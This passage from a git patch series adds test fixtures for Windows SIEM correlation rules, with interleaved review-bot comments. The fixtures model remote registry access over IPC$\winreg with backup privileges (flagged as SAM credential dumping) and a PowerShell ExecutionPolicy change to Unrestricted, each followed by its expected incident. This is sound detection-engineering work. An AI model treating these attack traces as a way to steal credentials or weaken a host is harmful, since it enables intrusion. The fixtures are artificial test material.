CreatePipeInstance)|ReadEA|WriteEA|ReadAttributes|WriteAttributes", "dst.fqdn": "dc01.stand2008.local", "dst.host": "dc01.stand2008.local", "dst.hostname": "dc01", "event_src.category": "Operating system", "event_src.fqdn": "dc01.stand2008.local", "event_src.host": "dc01.stand2008.local", "event_src.hostname": "dc01", "event_src.subsys": 
"Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_5145_A_network_share_object_was_checked", "importance": "medium", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "5145", "normalized": true, "object": "file_object", "object.fullpath": "\\ipc$\\winreg", "object.name": "winreg", "object.path": "\\ipc$\\", "object.storage.fullpath": "\\winreg", "object.storage.id": "\\\\*\\ipc$", "object.storage.name": "winreg", "object.storage.path": "\\", "object.type": "file", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T08:41:54.820Z", "src.host": "192.168.224.50", "src.ip": "192.168.224.50", "src.port": 54783, "status": "success", "subject": "account", "subject.account.domain": "stand2008", "subject.account.id": "S-1-5-21-3800063338-4262557262-2801230003-1603", "subject.account.name": "adm_back", "subject.account.privileges": "%%1538 %%1541 %%4416 %%4417 %%4418 %%4419 %%4420 %%4423 %%4424", "subject.account.session_id": "622342", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-06-13T08:03:45.109Z", "type": "raw", "uuid": "ea3ca7e4-5f8a-4b2a-96bb-7298b4065e63"} +{"action": "elevate", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4672\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12548\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-13T08:03:45.0937500Z\"},\"EventRecordID\":\"11412795\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"512\",\"ThreadID\":\"1208\"},\"Channel\":\"Security\",\"Computer\":\"dc01.stand2008.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3800063338-4262557262-2801230003-1603\"},{\"Name\":\"SubjectUserName\",\"text\":\"adm_back\"},{\"Name\":\"SubjectDomainName\",\"text\":\"STAND2008\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x97f06\"},{\"Name\":\"PrivilegeList\",\"text\":\"SeBackupPrivilege SeRestorePrivilege\"}]}}}", "category.generic": "Account", "category.high": "Users And Rights Management", "category.low": "Manipulation", "dst.fqdn": "dc01.stand2008.local", "dst.host": "dc01.stand2008.local", "dst.hostname": "dc01", "event_src.category": "AAA", "event_src.fqdn": "dc01.stand2008.local", "event_src.host": "dc01.stand2008.local", "event_src.hostname": "dc01", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4672_Special_privileges_assigned_to_new_logon", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4672", "normalized": true, "object": "account", "object.account.domain": "stand2008", "object.account.id": "S-1-5-21-3800063338-4262557262-2801230003-1603", "object.account.name": "adm_back", "object.account.privileges": "SeBackupPrivilege SeRestorePrivilege", "object.account.session_id": "622342", "recv_ipv4": 
"127.0.0.1", "recv_time": "2023-06-13T08:41:54.823Z", "src.fqdn": "dc01.stand2008.local", "src.host": "dc01.stand2008.local", "src.hostname": "dc01", "status": "success", "subject": "account", "subject.account.domain": "stand2008", "subject.account.id": "S-1-5-21-3800063338-4262557262-2801230003-1603", "subject.account.name": "adm_back", "subject.account.session_id": "622342", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-06-13T08:03:45.093Z", "type": "raw", "uuid": "0915db36-a28f-4471-93cc-9c41a6f778de"} +{"action": "login", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4624\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12544\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-13T08:03:45.0937500Z\"},\"EventRecordID\":\"11412796\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"512\",\"ThreadID\":\"1208\"},\"Channel\":\"Security\",\"Computer\":\"dc01.stand2008.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-0-0\"},{\"Name\":\"SubjectUserName\",\"text\":\"-\"},{\"Name\":\"SubjectDomainName\",\"text\":\"-\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x0\"},{\"Name\":\"TargetUserSid\",\"text\":\"S-1-5-21-3800063338-4262557262-2801230003-1603\"},{\"Name\":\"TargetUserName\",\"text\":\"adm_back\"},{\"Name\":\"TargetDomainName\",\"text\":\"STAND2008\"},{\"Name\":\"TargetLogonId\",\"text\":\"0x97f06\"},{\"Name\":\"LogonType\",\"text\":\"3\"},{\"Name\":\"LogonProcessName\",\"text\":\"Kerberos\"},{\"Name\":\"AuthenticationPackageName\",\"text\":\"Kerberos\"},{\"Name\":\"WorkstationName\"},{\"Name\":\"LogonGuid\",\"text\":\"{2a0e1034-b8ef-65ad-afa3-48bb81157893}\"},{\"Name\":\"TransmittedServices\",\"text\":\"-\"},{\"
Name\":\"LmPackageName\",\"text\":\"-\"},{\"Name\":\"KeyLength\",\"text\":\"0\"},{\"Name\":\"ProcessId\",\"text\":\"0x0\"},{\"Name\":\"ProcessName\",\"text\":\"-\"},{\"Name\":\"IpAddress\",\"text\":\"192.168.224.50\"},{\"Name\":\"IpPort\",\"text\":\"54783\"}]}}}", "category.generic": "Operating System", "category.high": "Access Management", "category.low": "Communication", "datafield6": "Network", "datafield9": "Kerberos", "dst.fqdn": "dc01.stand2008.local", "dst.host": "dc01.stand2008.local", "dst.hostname": "dc01", "event_src.category": "AAA", "event_src.fqdn": "dc01.stand2008.local", "event_src.host": "dc01.stand2008.local", "event_src.hostname": "dc01", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4624_An_account_was_successfully_logged_on", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "logon_auth_method": "remote", "logon_service": "Kerberos", "logon_type": 3, "mime": "application/x-pt-eventlog", "msgid": "4624", "normalized": true, "object": "system", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T08:41:54.823Z", "src.host": "192.168.224.50", "src.ip": "192.168.224.50", "src.port": 54783, "status": "success", "subject": "account", "subject.account.domain": "stand2008", "subject.account.id": "S-1-5-21-3800063338-4262557262-2801230003-1603", "subject.account.name": "adm_back", "subject.account.session_id": "622342", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-06-13T08:03:45.093Z", "type": "raw", "uuid": "b57dbb0c-2a91-4e3b-872e-2ed8587756ad"} + +# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "access", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "OS Credential Dumping: Security Account Manager", "correlation_name": "Remote_registry_access", "correlation_type": "incident", "datafield6": "0x12019f", "datafield9": "%%1538 %%1541 %%4416 %%4417 %%4418 %%4419 %%4420 %%4423 %%4424", "dst.fqdn": "dc01.stand2008.local", "dst.host": "dc01.stand2008.local", "dst.hostname": "dc01", "event_src.category": "Operating system", "event_src.fqdn": "dc01.stand2008.local", "event_src.host": "dc01.stand2008.local", "event_src.hostname": "dc01", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Remote_registry_access|622342", "incident.aggregation.timeout": 3600, "incident.category": "Undefined", "incident.severity": "medium", "object": "file_object", "object.fullpath": "\\ipc$\\winreg", "object.name": "winreg", "object.path": "\\ipc$\\", "object.storage.fullpath": "\\winreg", "object.storage.id": "\\\\*\\ipc$", "object.storage.name": "winreg", "object.storage.path": "\\", "src.host": "192.168.224.50", "src.ip": "192.168.224.50", "src.port": 54783, "status": "success", "subject": "account", "subject.account.domain": "stand2008", "subject.account.id": "S-1-5-21-3800063338-4262557262-2801230003-1603", "subject.account.name": "adm_back", "subject.account.privileges": "READ_CONTROL|SYNCHRONIZE|ReadData (or ListDirectory)|WriteData (or AddFile)|AppendData (or AddSubdirectory or CreatePipeInstance)|ReadEA|WriteEA|ReadAttributes|WriteAttributes", "subject.account.session_id": "622342", "subject.privileges": "SeBackupPrivilege SeRestorePrivilege"} 
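Review bot: The 5145 share-access event is placed first in test_1.sc although its timestamp (2023-06-13T08:03:45.109Z) is later than the 4672 and 4624 events that follow it (08:03:45.093Z), so the expected incident relies on the rule attaching a privilege event that arrives after the access it enriches (`subject.privileges` in the expect block comes from the 4672 PrivilegeList). If that out-of-order delivery is deliberate, say so on the comment line, e.g. `# 5145 arrives before the 4672/4624 it depends on; SeBackupPrivilege SeRestorePrivilege must still be attached to the incident`; if not, order the events by their `time` field, which appears to be what test_2.sc does by starting with the 4672 event. The expect block also puts the raw `%%` access codes in `datafield9` and the decoded access list in `subject.account.privileges`, the reverse of the input 5145 event, so a short line confirming that this swap is what the rule emits rather than a copy-paste mix-up would help the next reader.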
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Remote_registry_access/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Remote_registry_access/tests/test_2.sc
new file mode 100644
index 00000000..dea6c0de
--- /dev/null
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Remote_registry_access/tests/test_2.sc 
@@ -0,0 +1,6 @@ +{"action": "elevate", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4672\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12548\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2022-02-16T10:37:20.4504122Z\"},\"EventRecordID\":\"2988528\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"624\",\"ThreadID\":\"2908\"},\"Channel\":\"Security\",\"Computer\":\"01566s-win16-ir.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-220106\"},{\"Name\":\"SubjectUserName\",\"text\":\"samir\"},{\"Name\":\"SubjectDomainName\",\"text\":\"3B\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x567515\"},{\"Name\":\"PrivilegeList\",\"text\":\"SeBackupPrivilege SeRestorePrivilege\"}]}}}", "category.generic": "Account", "category.high": "Users And Rights Management", "category.low": "Manipulation", "dst.fqdn": "01566s-win16-ir.threebeesco.com", "dst.host": "01566s-win16-ir.threebeesco.com", "dst.hostname": "01566s-win16-ir", "event_src.category": "AAA", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4672_Special_privileges_assigned_to_new_logon", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4672", "normalized": true, "object": "account", "object.account.domain": "3b", "object.account.id": "S-1-5-21-308926384-506822093-3341789130-220106", "object.account.name": "samir", "object.account.privileges": 
"SeBackupPrivilege SeRestorePrivilege", "object.account.session_id": "5666069", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T12:35:27.481Z", "src.fqdn": "01566s-win16-ir.threebeesco.com", "src.host": "01566s-win16-ir.threebeesco.com", "src.hostname": "01566s-win16-ir", "status": "success", "subject": "account", "subject.account.domain": "3b", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-220106", "subject.account.name": "samir", "subject.account.session_id": "5666069", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2022-02-16T10:37:20.450Z", "type": "raw", "uuid": "8c93aa37-468e-4b7a-a0ef-d90a87c07405"} +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"5145\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12811\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2022-02-16T10:37:20.4515786Z\"},\"EventRecordID\":\"2988531\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"7720\"},\"Channel\":\"Security\",\"Computer\":\"01566s-win16-ir.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-220106\"},{\"Name\":\"SubjectUserName\",\"text\":\"samir\"},{\"Name\":\"SubjectDomainName\",\"text\":\"3B\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x567515\"},{\"Name\":\"ObjectType\",\"text\":\"File\"},{\"Name\":\"IpAddress\",\"text\":\"172.16.66.25\"},{\"Name\":\"IpPort\",\"text\":\"50251\"},{\"Name\":\"ShareName\",\"text\":\"\\\\\\\\*\\\\IPC$\"},{\"Name\":\"ShareLocalPath\"},{\"Name\":\"RelativeTargetName\",\"text\":\"winreg\"},{\"Name\":\"AccessMask\",\"text\":\"0x12019f\"},{\"Name\":\"AccessList\",\"text\":\"%%1538 %%1541 %%4416 %%4417 
%%4418 %%4419 %%4420 %%4423 %%4424\"},{\"Name\":\"AccessReason\",\"text\":\"-\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "datafield6": "0x12019f", "datafield9": "READ_CONTROL|SYNCHRONIZE|ReadData (or ListDirectory)|WriteData (or AddFile)|AppendData (or AddSubdirectory or CreatePipeInstance)|ReadEA|WriteEA|ReadAttributes|WriteAttributes", "dst.fqdn": "01566s-win16-ir.threebeesco.com", "dst.host": "01566s-win16-ir.threebeesco.com", "dst.hostname": "01566s-win16-ir", "event_src.category": "Operating system", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_5145_A_network_share_object_was_checked", "importance": "medium", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "5145", "normalized": true, "object": "file_object", "object.fullpath": "\\ipc$\\winreg", "object.name": "winreg", "object.path": "\\ipc$\\", "object.storage.fullpath": "\\winreg", "object.storage.id": "\\\\*\\ipc$", "object.storage.name": "winreg", "object.storage.path": "\\", "object.type": "file", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T12:35:27.482Z", "src.host": "172.16.66.25", "src.ip": "172.16.66.25", "src.port": 50251, "status": "success", "subject": "account", "subject.account.domain": "3b", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-220106", "subject.account.name": "samir", "subject.account.privileges": "%%1538 %%1541 %%4416 %%4417 %%4418 %%4419 %%4420 %%4423 %%4424", "subject.account.session_id": "5666069", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": 
"2022-02-16T10:37:20.451Z", "type": "raw", "uuid": "e3eba102-ac65-4f59-8231-ac059985af3a"} +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"5145\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12811\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2022-02-16T10:37:20.5086654Z\"},\"EventRecordID\":\"2988532\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"7208\"},\"Channel\":\"Security\",\"Computer\":\"01566s-win16-ir.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-220106\"},{\"Name\":\"SubjectUserName\",\"text\":\"samir\"},{\"Name\":\"SubjectDomainName\",\"text\":\"3B\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x567515\"},{\"Name\":\"ObjectType\",\"text\":\"File\"},{\"Name\":\"IpAddress\",\"text\":\"172.16.66.25\"},{\"Name\":\"IpPort\",\"text\":\"50251\"},{\"Name\":\"ShareName\",\"text\":\"\\\\\\\\*\\\\IPC$\"},{\"Name\":\"ShareLocalPath\"},{\"Name\":\"RelativeTargetName\",\"text\":\"winreg\"},{\"Name\":\"AccessMask\",\"text\":\"0x12019f\"},{\"Name\":\"AccessList\",\"text\":\"%%1538 %%1541 %%4416 %%4417 %%4418 %%4419 %%4420 %%4423 %%4424\"},{\"Name\":\"AccessReason\",\"text\":\"-\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "datafield6": "0x12019f", "datafield9": "READ_CONTROL|SYNCHRONIZE|ReadData (or ListDirectory)|WriteData (or AddFile)|AppendData (or AddSubdirectory or CreatePipeInstance)|ReadEA|WriteEA|ReadAttributes|WriteAttributes", "dst.fqdn": "01566s-win16-ir.threebeesco.com", "dst.host": "01566s-win16-ir.threebeesco.com", "dst.hostname": "01566s-win16-ir", "event_src.category": "Operating system", "event_src.fqdn": 
"01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_5145_A_network_share_object_was_checked", "importance": "medium", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "5145", "normalized": true, "object": "file_object", "object.fullpath": "\\ipc$\\winreg", "object.name": "winreg", "object.path": "\\ipc$\\", "object.storage.fullpath": "\\winreg", "object.storage.id": "\\\\*\\ipc$", "object.storage.name": "winreg", "object.storage.path": "\\", "object.type": "file", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T12:35:27.482Z", "src.host": "172.16.66.25", "src.ip": "172.16.66.25", "src.port": 50251, "status": "success", "subject": "account", "subject.account.domain": "3b", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-220106", "subject.account.name": "samir", "subject.account.privileges": "%%1538 %%1541 %%4416 %%4417 %%4418 %%4419 %%4420 %%4423 %%4424", "subject.account.session_id": "5666069", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2022-02-16T10:37:20.508Z", "type": "raw", "uuid": "19727dc8-193a-4062-ba1e-a5c197eea927"} + +# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "access", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "OS Credential Dumping: Security Account Manager", "correlation_name": "Remote_registry_access", "correlation_type": "incident", "datafield6": "0x12019f", "datafield9": "%%1538 %%1541 %%4416 %%4417 %%4418 %%4419 %%4420 %%4423 %%4424", "dst.fqdn": "01566s-win16-ir.threebeesco.com", "dst.host": "01566s-win16-ir.threebeesco.com", "dst.hostname": "01566s-win16-ir", "event_src.category": "Operating system", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Remote_registry_access|5666069", "incident.aggregation.timeout": 3600, "incident.category": "Undefined", "incident.severity": "medium", "object": "file_object", "object.fullpath": "\\ipc$\\winreg", "object.name": "winreg", "object.path": "\\ipc$\\", "object.storage.fullpath": "\\winreg", "object.storage.id": "\\\\*\\ipc$", "object.storage.name": "winreg", "object.storage.path": "\\", "src.host": "172.16.66.25", "src.ip": "172.16.66.25", "src.port": 50251, "status": "success", "subject": "account", "subject.account.domain": "3b", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-220106", "subject.account.name": "samir", "subject.account.privileges": "READ_CONTROL|SYNCHRONIZE|ReadData (or ListDirectory)|WriteData (or AddFile)|AppendData (or AddSubdirectory or CreatePipeInstance)|ReadEA|WriteEA|ReadAttributes|WriteAttributes", "subject.account.session_id": "5666069", "subject.privileges": "SeBackupPrivilege SeRestorePrivilege"} From 467a7eccfb7a96861a5e940f1fb39e76e37ec733 Mon Sep 17 00:00:00 2001 
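Review bot: The hunk commits the scaffold placeholder `# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь` as the test's only comment; replace it with a line that states the scenario, e.g. `# 4672 with SeBackup/SeRestore, then two 5145 opens of IPC$\winreg in logon 0x567515 (5666069) -> one incident, aggregated by session`, so a reader knows `expect 1` is asserting that the second access folds into the first rather than that the rule is single-event. Both Remote_registry_access tests in this series are positive cases; if the harness supports a zero expectation, a sibling test with a 4672 whose PrivilegeList lacks SeBackupPrivilege/SeRestorePrivilege, or a 5145 against a different IPC$ pipe, would guard against the rule being broadened later. Note also that in the expected incident `datafield9` carries the raw `%%1538 …` access codes while `subject.account.privileges` carries the resolved names — the reverse of the normalized 5145 event it is built from; test_1 pins the same mapping, so this is presumably the rule's doing, but it reads like a field swap and is worth confirming before the tests cement it.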
From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Mon, 31 Jul 2023 10:41:55 +0300 Subject: [PATCH 16/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD=D1=8B?= =?UTF-8?q?=D0=B9=20=D1=82=D0=B5=D1=81=D1=82=20=D0=B4=D0=BB=D1=8F=20=D0=BF?= =?UTF-8?q?=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Change=5Fpowershell=5Fp?= =?UTF-8?q?olicy=5Fregistry)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Change_powershell_policy_registry/tests/test_1.sc | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Change_powershell_policy_registry/tests/test_1.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Change_powershell_policy_registry/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Change_powershell_policy_registry/tests/test_1.sc new file mode 100644 index 00000000..d033e8de --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Change_powershell_policy_registry/tests/test_1.sc 
@@ -0,0 +1,4 @@ +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"13\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"13\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-05-24 15:38:21.485899\"},\"EventRecordID\":\"1387\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"220\",\"ThreadID\":\"2200\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"Defense Evasion - PowerShell ExecPolicy Changed\"},{\"Name\":\"EventType\",\"text\":\"SetValue\"},{\"Name\":\"UtcTime\",\"text\":\"2019-05-24 15:38:21.365\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-0fae-5ce8-0000-0010fe1e0800}\"},{\"Name\":\"ProcessId\",\"text\":\"3208\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\"},{\"Name\":\"TargetObject\",\"text\":\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\PowerShell\\\\1\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy\"},{\"Name\":\"Details\",\"text\":\"Unrestricted\"}]}}}", "category.generic": "Registry Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.rule": "Defense Evasion - PowerShell ExecPolicy Changed", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_13_Registry_value_changed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "13", 
"normalized": true, "object": "reg_object", "object.fullpath": "\\registry\\machine\\software\\microsoft\\powershell\\1\\shellids\\microsoft.powershell\\executionpolicy", "object.name": "executionpolicy", "object.new_value": "unrestricted", "object.path": "\\registry\\machine\\software\\microsoft\\powershell\\1\\shellids\\microsoft.powershell\\", "object.property": "value", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-10T16:50:46.783Z", "status": "success", "subject.process.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "subject.process.guid": "365abb72-0fae-5ce8-0000-0010fe1e0800", "subject.process.id": "3208", "subject.process.name": "powershell.exe", "subject.process.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-05-24T15:38:21.365Z", "type": "raw", "uuid": "036f8f61-521a-493a-8499-c6c5ebbf8ae7"} + +# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "modify", "alert.context": "powershell.exe: unrestricted -> \\registry\\machine\\software\\microsoft\\powershell\\1\\shellids\\microsoft.powershell\\executionpolicy", "alert.key": "unrestricted -> \\registry\\machine\\software\\microsoft\\powershell\\1\\shellids\\microsoft.powershell\\executionpolicy", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Modify Registry", "correlation_name": "Change_powershell_policy_registry", "correlation_type": "incident", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.rule": "Defense Evasion - PowerShell ExecPolicy Changed", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Change_powershell_policy_registry|iewin7|powershell.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "reg_object", "object.fullpath": "\\registry\\machine\\software\\microsoft\\powershell\\1\\shellids\\microsoft.powershell\\executionpolicy", "object.name": "executionpolicy", "object.new_value": "unrestricted", "object.path": "\\registry\\machine\\software\\microsoft\\powershell\\1\\shellids\\microsoft.powershell\\", "object.property": "value", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "subject.process.guid": "365abb72-0fae-5ce8-0000-0010fe1e0800", "subject.process.id": "3208", "subject.process.name": "powershell.exe", "subject.process.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\"} From f9e306a979e6c087bdc0a28fba7f767ce0d4eb11 Mon Sep 17 00:00:00 2001 
